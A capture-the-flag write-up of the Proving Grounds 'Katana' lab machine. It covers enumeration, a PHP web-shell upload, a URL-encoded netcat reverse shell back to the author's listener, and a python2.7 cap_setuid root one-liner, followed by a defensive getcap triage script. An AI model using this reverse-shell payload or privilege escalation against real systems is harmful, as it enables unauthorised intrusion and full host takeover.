KATANA has been PWNED!!!! — Offensive Security

This is one of the Proving Grounds machines from Offensive Security, rated easy. So let’s pwn this machine.

ENUMERATION

Starting off by scanning for open ports and the services behind them.

Highlighting all of these is good practice ;-) . The scan turned up several open ports and numerous HTTP services. Since there are so many, nikto will be my last approach.

Brute-forcing web content on the different HTTP ports, with one output file per port:

gobuster.txt is for port 80

gobuster8088.txt is for port 8088

gobusterdir.txt is for dir brute on port 80

gobusterdir8088.txt is for dir brute on port 8088

And surprisingly I found upload.html. Without further ado I uploaded a one-line PHP payload and waited one minute, as the web page instructs. Since the initial recon showed many HTTP services running, I then hopped over to port 8715 with the URL of the uploaded file. Suppose the uploaded file is named cmd.php; it is served as katana_cmd.php, so the encoded payload is:

http%3A%2F%2F192.168.100.131%3A8715%2Fkatana_cmd.php%3Fcmd%3Dnc%20-e%20%2Fbin%2Fsh%20192.168.100.128%209999

My netcat listener was waiting on port 9999, and YES!!! we’re in!

Privilege Escalations

Enumerating the target machine after gaining access, I looked for file capabilities and found that python2.7 carries cap_setuid with the +ep flags (effective and permitted, not “empty”). Any user who runs that binary, www-data included, therefore gets CAP_SETUID inside the interpreter and can call setuid(0), so I escalated from the low-privilege shell to root with the command below.

python2.7 -c 'import pty;import os;os.setuid(0);pty.spawn("/bin/dash")'

And we are now root!!! Grabbed the flag too ;-)
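To make the capability check repeatable, here is an added example (written for this page, not taken from the writeup) that triages `getcap -r / 2>/dev/null` output for entries like the one that gave root above. The sample output is constructed; only the python2.7 line mirrors the post’s finding, the other paths are illustrative assumptions. It handles both libcap output styles and spells out what the e/p/i flags mean.

```python
"""Added example: triage getcap output for root-equivalent file capabilities.

Written for this page, not taken from the writeup. The sample below is
constructed; only the python2.7 entry mirrors the post's finding.
"""
import re
import sys
from typing import Dict, Iterable, List

# Constructed sample of `getcap -r / 2>/dev/null`. Both libcap styles appear:
# older "path = caps+flags" and newer (libcap 2.41+) "path caps=flags".
SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep
/usr/lib/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
/usr/bin/tcpdump cap_net_admin,cap_net_raw=ip
"""

FLAG_NAMES = {"e": "effective", "p": "permitted", "i": "inheritable"}

# Capabilities that turn "can run this binary" into root (or equivalent) when the
# binary is an interpreter or otherwise lets the caller choose what it does.
ROOT_EQUIVALENT = {
    "cap_setuid": "setuid(0) from inside the program, then spawn a shell",
    "cap_setgid": "switch to gid 0 or the shadow group",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow or root's SSH keys",
    "cap_dac_override": "read and write any file",
    "cap_sys_admin": "mount, namespaces and many other root-only operations",
    "cap_sys_ptrace": "inject into processes running as root",
    "cap_sys_module": "load a kernel module",
    "cap_chown": "take ownership of any file",
    "cap_fowner": "change permissions on files you do not own",
    "cap_setfcap": "grant further file capabilities",
}

_LINE = re.compile(
    r"^(?P<path>\S+)\s+(?:=\s+)?(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$"
)


def parse_getcap(output: str) -> List[Dict]:
    """Parse getcap output into {path, caps, flags}; unparseable lines are skipped
    (paths containing spaces are not handled)."""
    records = []
    for line in output.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        records.append({
            "path": m["path"],
            "caps": m["caps"].split(","),
            "flags": set(m["flags"]),
        })
    return records


def explain_flags(flags: Iterable[str]) -> str:
    """'ep' -> 'effective, permitted'. The +ep in the writeup is this, not 'empty'."""
    flags = set(flags)
    return ", ".join(FLAG_NAMES[f] for f in "eip" if f in flags)


def privesc_candidates(output: str) -> List[Dict]:
    """Entries holding a root-equivalent capability in the permitted set.
    'e' means the process starts with it active; 'p' alone still lets the
    program raise it, so permitted is the bar, not effective."""
    hits = []
    for rec in parse_getcap(output):
        if "p" not in rec["flags"]:
            continue
        dangerous = [c for c in rec["caps"] if c in ROOT_EQUIVALENT]
        if dangerous:
            hits.append({
                "path": rec["path"],
                "caps": dangerous,
                "flags": explain_flags(rec["flags"]),
                "why": [ROOT_EQUIVALENT[c] for c in dangerous],
            })
    return hits


if __name__ == "__main__":
    # Pipe real output in: getcap -r / 2>/dev/null | python3 triage.py
    data = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_GETCAP
    for hit in privesc_candidates(data):
        print(f"{hit['path']}: {', '.join(hit['caps'])} ({hit['flags']})")
        for reason in hit["why"]:
            print(f"  -> {reason}")
```

On the sample this flags only `/usr/bin/python2.7`, which is exactly the case where the page’s `os.setuid(0)` one-liner applies; for a different interpreter the same idea holds with that language’s setuid call. The fix on a host you own is `setcap -r /usr/bin/python2.7` and a periodic diff of `getcap -r /` against a known-good baseline.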

— — — — — — — — — — — — — — — — — — — — — — — -

Let me know if you face any issues

================

That’s all for now,

Until Next Time,

You are Awesome!!!

— — — — — — — — — — — — —

Neelesh Patel

Cybersecurity | CTFs | Networking |